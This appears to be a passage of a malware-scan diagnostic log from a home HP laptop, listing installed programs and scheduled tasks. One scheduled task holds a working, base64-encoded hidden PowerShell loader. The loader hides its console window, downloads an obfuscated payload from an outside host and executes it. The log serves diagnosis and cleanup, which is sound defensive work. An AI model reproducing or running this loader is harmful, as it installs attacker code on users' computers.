CyberLink PowerDirector 12 (Version: 12.0.4.4301 - CyberLink Corp.) Hidden
CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.1.4301 - CyberLink Corp.)
Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.2 - Dropbox, Inc.)
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
Evernote v. 5.8.6 (HKLM-x32\...\{FEDC7C10-EF67-11E4-9B07-00505695D7B0}) (Version: 5.8.6.7519 - Evernote Corp.)
Family Vacation 2: Road Trip (x32 Version: 3.0.2.59 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
Hoyle Card Games 2005 (HKLM-x32\...\{B44AA698-B221-4B3B-8CA5-E65EF6A5AF26}) (Version: 1.2.0.0 - Encore, Inc.)
HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
HP CoolSense (HKLM-x32\...\{1504CF6F-8139-497F-86FC-46174B67CF7F}) (Version: 2.20.51 - Hewlett-Packard Company)
HP Documentation (HKLM\...\HP_Documentation) (Version:  - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8293.5264 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{61EB474B-67A6-47F4-B1B7-386851BAB3D0}) (Version: 8.1.40.3 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{D7D5F438-26EF-45AB-AB89-C476FBCF8584}) (Version: 12.0.30.219 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - Hewlett-Packard Company)
HP Wireless Button Driver (HKLM-x32\...\{EFA01423-3857-468C-B7B6-F30AA08E50BC}) (Version: 1.1.5.1 - Hewlett-Packard)
IGT Slots: Paradise Garden (x32 Version: 3.0.2.59 - WildTangent) Hidden
Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation)
Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10600.147 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1158 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.15.4240 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
iTunes (HKLM\...\{E690A491-702F-4DEC-9977-C015D1DBB57C}) (Version: 12.3.1.23 - Apple Inc.)
Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
Living Legends: Frozen Beauty Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Lands: Dark Overlord Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.6366.2062 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mystery Expedition: Prisoners of Ice (x32 Version: 3.0.2.59 - WildTangent) Hidden
Office 16 Click-to-Run Extensibility Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.6326.1022 - Microsoft Corporation) Hidden
Opera Stable 35.0.2066.37 (HKLM-x32\...\Opera 35.0.2066.37) (Version: 35.0.2066.37 - Opera Software)
PDF Converter Elite 4.0 (HKLM\...\{51807840-3627-4016-B579-A32D54097837}_is1) (Version: 4.0 - PDFConverter.com)
Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.370.99 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7564 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.0.0.59 - REALTEK Semiconductor Corp.)
Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
Star Wars Empire at War (HKLM-x32\...\{99AE7207-8612-4DBA-A8F8-BAE5C633390D}) (Version: 1.0 - LucasArts)
Star Wars Empire at War Forces of Corruption (HKLM-x32\...\{6592FDEC-2C1A-413A-9985-25FEC2F0848D}) (Version: 1.0 - LucasArts)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.97 - Synaptics Incorporated)
Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.4.0 - WildTangent)
WildTangent Games App for HP (x32 Version: 4.0.11.16 - WildTangent) Hidden
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-2478984944-2039465796-333368353-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Jonathan\AppData\Local\Microsoft\OneDrive\17.3.6281.1202\FileCoAuth.exe (Microsoft Corporation)
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {15D4F159-847C-4876-8F6C-2D3A9B15F851} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {1F192880-6B02-411A-B8E0-3BFF632E5DB3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-10-31] (Google Inc.)
Task: {3DD3C169-FF2E-4083-BC62-9EFDBA87CCAB} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-01-19] (Microsoft Corporation)
Task: {3ED847F7-E9A3-4B3E-B370-7599C6E99510} - System32\Tasks\Opera scheduled Autoupdate 1446314695 => C:\Program Files (x86)\Opera\launcher.exe [2016-02-01] (Opera Software)
Task: {4AD36820-EBAF-40DE-997D-697CADBC567F} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-01-17] (Microsoft Corporation)
Task: {4C411F4E-EC13-4C36-AF83-654DEBB5A394} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-01-12] (Hewlett-Packard Company)
Task: {4E474ABA-D6C6-44FB-842D-80D8601DA9C7} - System32\Tasks\avast! SL Update => C:\Program Files\AVAST Software\SecureLine\SLUpdate.exe [2016-01-01] (AVAST Software)
Task: {5BB340FA-98D2-4DA0-94D1-6CD0DEC5E954} - System32\Tasks\{7E0B0E47-0F79-0808-0B11-0C0C0A7F110C} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAdQBuAGwAbwBuAGcAbwAuAGkAbgBmAG8ALwB1AC8APwBhAD0AZQBzAHoASABHAHEAUwBjAEUAeQBxAG0AeAB4AGQANQBvAFMAUABkADQAdABSAFYAQwAxAHAATABaAGQAQwBIAF8AZABqAGoAbgBKADUAagA4AHQATgBZAEkAaQBrAEcAeABaAEEAagBtAHIAbABPAEYAWQBpAFAAYwBaAEYAbgBQADAAXwA0ADcAWgA1AEsATgBNADcAcQBiAHcASQB0AHkATQA1AG4AZgB1AHIANgBFAFQAcwBzAHoANwBEAHMAcgBGAHUARABiAFUAYQBQAHgAMQBRAG0ASgBYAEcATwBNAHoATQBFAGIAMQBiAFEAbQBZADgAaAB6AEMAOQB0ADUASwBfAE8AYQBPAEQAZABjAEsAXwBMAEIAYQBSAGIAdgAyAG8AQQBGADQAdQA1AHcAdgB5AHgAZwA0ADAARwB1AEsAdgAtAHEAOQA1AEoALQBlAGcAYQBOAGUAeABVAGUAWgBWAHEANQBhAFgAZQBuAGoAZQByAGUAMwB1AGkAZABiAF8AMQA5ADcAYwBUAEwAOQBvAHQAbQBJAEwAbABKAF8AVQBlAHIAUABDAEYATwBSADYATgBwAHgATwBUADgAaABFADcARgByAHUAZQBLAGkARwBrAGEAWQBHAHAATwBYAGUAQQBNADEAaABfAG8AYgBJAFQATgBGADgAbABVAEIANgBpAE0AWgBLAF8AVgBXAG0AMQBkAE8AWgBmAEEAbABBAE4AMABzAEIAVwB2AHAAQgBjADkAbAAxAHIAUgBPAHAAdwA5AFQAbAByAEkAawBzAHUAbwBmAHYAUQBMAGoAUABhAGQAOAB0AHcAVwBDAC0AcABIAHYARgBVAGIARwA2AGQASQB5AEUAZABDAFkAOABvAE4AYwBJAEoAdAAzAEEARQBzAGsAbgA1ADQAaAB6AEIARgBfAHgAMQBUAEkASABSAC0AZQBsAG8AaABLAGIAYwBCAE4AbQBDAEkAaQBIAGoAcgBlAGwAbQA3AEcAZABqAGUANQBhAHcANABpAFMAdABVAHQAQwBmAGUAawA2AHgAbgBDAG0AdABXAF8AMABPAC0AQwB2AF8AXwBmAGkAUwA3AFcAVwBoAEkATwAyAGQASAA0AGIAVAA0ADAAUABMADQAaQB4AFEAagBOAHIANQAzADYAMQA3ADgAeAAxADYASwBuADQATABZAEUAZABxAFUAMwB0AC0ARwBoADAAWgBfAHIAYwAwAGwAXwBoAEcAaQBMAFMAcABSADEAdABwAGcAOQA2ADQAZgBwAEcAQgBhAEoATgBvADQANwBWAEwAOQBqAGwAXwB3AGgAbQBQAHIAUQA4AFMAbAB3AGIARQBGAC0AaQBoAGsAWgBWAHgATABBAE8AOABOAE0AWgA1AEoARQAtAFcAdABrAGgAVABDADkAbwBzAE0AUwBDAEkAbQBPAGwATgBIAG4AdQB3AEoAMwBzAFoAeQAzADQAMAA5AFgASAAwAFMAawAwAHUAZQBaAE8AYQBGAFkAQgA1AEUAMABoADMAagBtAG0AcwAzAEIAMQBfAHQAZAB5AFAAcwBGADkALQBtADcAdwBmAFUAVQBNAEIAOQBOAFcASgBMAG0AbgBIAHYAZABmADgAUABKAEMAdQBuADcAVwBIAC0ASwAyADAARAB2ADIAdwBlAEUAWABVAHMATAA1AEcAegBWAGwASgBmAFUAbgBmAGMASAB3AEwAVwByAEkAdAA3AEcANABjAG0ATgAzAGUASwBPAC0AQwB6AG8AYwBtAGsAcgBlAE4ANABqAG4ATQB0ADQAQgBWAEQAYwAyAGkAbABNAGsAUwB5ADgAZQBTAGgAQQB4AEgAYwB1AGIAXwBaADMAVABYAG0AWgBFADgAaQBzAHgAeQBoADkAMABmAGYASAB6AHAATgB5AHkANAB6AFkAcgAwADIAeQBUADIAQgBWADQAMwB4AFIATgBYAG4ASwBEAEoASwAwAGwASgBZAEcAaAAyAHMAUwB6AEEANABzAHgANABQAGoALQBZADgANABvADUASQBHAHUATgBQAEsAYgBGAHAAMwBmADcAaABIAHMAcwBhADEAbABMAGsAeQBfAF8ARgBlAGYAeABIAGkANQBaADMASgA5AG4AbABfAHgANwB4AHAATAA0AGcAUQBHAGQAawBXAGgANABxADYAdQBzADkAdwBXADEAUQA3AE0AWgBBAC0AbQBNAG8AVwBYAGoAdABEAEsAYgBHAFoAeABjADAAZwB1AHUAbwAzAFEAdABQAEsAegB4AG0AagBlAG0AOQB6ADYAMgBsAGwAZQBZADcANwBUAFgANwA5AFUAYwAwAEMAWQBwAF8ARgAmAGMAPQBvAEoAeABSAEYAUABOAFAALQB6AEkARQBxAHMAQQBPAFcARQBaADAAOABnAE8AZgBuADMAZABhAGsAZQA1AG8AcABZAGgAcwBYAEkAYgBfAEcAQgBSADEASQA4AHEAawB3AEIAcwBZAGQAYwBEAGUARwBUAHAAZwBDAFoAbQBDAHQAawBPADYARQBfAHQAbgA4AHcASgBoAEgAMAAwAFQAVgB3AEwATgBCADUAegBxAE0AVQBYADEAUwB0AGIAWABCAGQAbQBaADMAQgBtAGwASwBKAFAAdwBkAGIANgA5AHYAdgBoAC0AdwA1AFEAbQBjAFQAdABFAGUARAA3AHAAVABVAGUASQA0AGsAMQA0AGkAcwBYAGEANwBEAEIAOAA5AEUAUwB5AEIANQBUAHIARgA5AFoAOABRAG8AbQBtADYASABCAHMAawBlAGEAQwBoADIAMQBRAEsAQgBBADIAVwA0AGQAZgB2ADkAaQBYADYAZAB0ADIAVgBRADEAWgBOADEAUgBOAGYAaQB6AE4AagBYAFMAaABUAFgAUwB6ADAAWQBpAE4ANwBFAFkAcwAxAEYARAAwAEoALQBuAFUAdQA1AHYAQgBYAHEANQBzAHIARABEADUALQAwAFcAWABXAHEAVAAtAEwAMgB2AGIAVQBEAGMATgBMAFMAOAA1AEEAcAB4AEwAbABlADEARQBYAHEATQBmAEYAUgBIAC0AawBMAHcAWQBXAGsAZQB0AFUARQA5AGsAQQBMAEoAcQBNAEIAOQBEAEkATQB0AHYAWQB5AGcAWQBPAFkAcwByAGUAMQBCAHcATwB1AHcAcgBTAGcAbgBrADIAbQBaAF8AZgAtAFQAeQBJAFYASgBFAGsAXwBzAF8ATAA1AGUAMABRAF8AMwBjAGcAQQBEAGkATwBKAEgAUQBLAFQATwBPAHgATAB4AGEAegBFAHMATgBpAFQAQgBxAFoASgB3AHMAcQBQAGgAdwA1AFUAQQB2AGcAXwB1ADIAOABaAG0AawBFAEkATwBwAEEAdQBSAHIAVgB3ADcAMQB3ADgASABiAHIAVwBlADkAMgByADMAeABnAEIASAAzAHUAVgAzAFUASQBvAG4AagBZAGsAYQA0AHEAQwB0AFcALQB2AFQAeABrAHIAXwBuAHIAaQBNAGcATABHAGMAZwBKAGsANQB2AGQALQAtAGsASwBtAHYAaAA0AF8AcABFAGcATQAtAGgAOABnADIAYgBQADUANAAwAHgATQBMAHMAdQA2AGUAVQBGADYAYQAyAEEAVQBQAGcAQgBmAGYAaABHAGoAMwB1AEQARABSAHEAMwBvAFQAbQBBAFcAYQBGAFgAagBwADMASgBqAFkALQA0ADIAUwBLAEkAMQBIAHUAVwBBAHcAZgB5AEYAdABJAG0AeABtADMARQBqAFQASgA0AFIAeABLAHIATQBRADUAegB6AGoAaQB4AC0ANgAtAFcANgBoAEUAVQBxAFMAMgA3ADgAZQBvAEQATABxAEQAWgBNAEYAUQBjAGgAYQBPAHkAdgBlAEcAcwBBADMAVwBVAEoAYgBaAGIARwBqAHIAdAB4AEwAZABhAFkAYQA1AF8AZgBrAEwAUQA5AHMASgA5AGkANABPAFIAMwA2AHEAVABFAEoAbQBvAFMAbABVADEAYQBHAEsATwBkAGEAVABUAEEAQQBMAFkAeQA0AEMASgA4AFEASgB1AE4AVQBOAFIASgBEAE0AcABQAHQAOABVADIAeQBMAEcARgB6AGQAXwBOAHMASQBqADEAbABNAEsAagBzAG0AagBKAG0AUAA1AEYAUQBWAFgATQBnAEsAUgAtAHUARABLAE4AZwAyAE0AbQBJAGIAeAA1AFUAZQBSAGQAMQA0AHYAdABOAEYANgByAFUAdABlAEwAUgBKAEkAeAA0AGcASABSAHMANQAtAEcAZgBxAFMAMwBUAFoAUQBBAEcAZgB5AEYAOAAzADQASgA1AGkAdwA0AG0AYgB4AEgASABmADgAMQB6ADYAUgBOAHkAWQBsAE8AbwBLAFcAdgBlAFcALQBfAF8ASwB5AGUATgBzADYAVwBKAFUARwBMAFUARQBXADQAbgBnAGQAeABXAFgAZwA4ADMAdgBHAHoAVQB1AEkALQBOADgAbgB5AFcANQA2AFYAOAB0AEcAawBkADUASwBZAFkAZQBZAEEAaABIAGUAUgAzAEwAbQAtAHEAYQBpADgAdwBMAGgAeABlAHAAVABiAEcAawBBADUAagB3ADcAOQBuAEkANAByAG4AcgA2AHkAVABrAHEAZAA4AFUAVQBsAGwANQBKAHIAeQBUAHMATQA1AFIAUABtAHMAeABXAF8ANQBVAHQAaQBHAG4ATwB5AFkAVgBHAHoAeQB2AEkAMwB1AEIARwBQAGIASQAxAGQAQQBiAHgAbgBnAHoAQwBRAFgAMgBoAGwAagBlAHEAbwB6AEkAUQBRADcAZgAyAHUAXwBQAGkAdABEADQAaQA5AEMAegBiAE8AJgByAD0AMwAzADEAMQA3ADAANQAyADMAOAA3ADAAOQA2ADUANwA3ADcAMgAiADsAJABzAHQAcwBrAD0AIgB7ADcARQAwAEIAMABFADQANwAtADAARgA3ADkALQAwADgAMAA4AC0AMABCADEAMQAtADAAQwAwAEMAMABBADcARgAxADEAMABDAH0AIgA7ACQAcAByAGkAZAA9ACIATwBuAGUAUwB5AHMAdABlAG0AQwBhAHIAZQAiADsAJABpAG4AaQBkAD0AIgBTAEoATABLAEwATQBNAEoAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
